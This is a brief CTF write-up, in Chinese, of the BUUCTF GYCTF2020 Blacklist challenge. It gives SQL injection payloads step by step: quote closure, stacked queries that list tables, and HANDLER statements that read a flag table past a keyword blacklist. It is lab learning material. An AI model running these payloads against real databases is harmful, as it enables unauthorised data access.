buuctf-[GYCTF2020]Blacklist1（小宇特詳解）

1.先看題目是一道sql注入的題目

先嘗試進行閉合

payload：1’

這里可以試出來是'來進行閉合即可

2.然后嘗試著進行聯合查詢

發現是進行了過濾。

3.這里嘗試著進行堆疊注入

payload:1’;show tables;#

4.查表

payload：1’; show columns from FlagHere;#

這里屏蔽了許多東西

5.這里由于rename，和alter被過濾了，這里考慮利用HANDLER語句

這里先解釋一下HANDLER語句的用法

這里的HANDLER語句和select查詢語句都可以在mysql中查詢想要的東西

他的基本語句是

通過HANDLER tbl_name OPEN打開一張表，無返回結果。

通過HANDLER tbl_name READ FIRST獲取tbl_name的第一行，通過READ NEXT依次獲取其它行。最后一行執行之后再執行NEXT會返回一個空的結果。
通過HANDLER tbl_name CLOSE來關閉打開的tbl_name。

payload：1’;handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

總結

以上是生活随笔為你收集整理的buuctf-[GYCTF2020]Blacklist1（小宇特详解）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。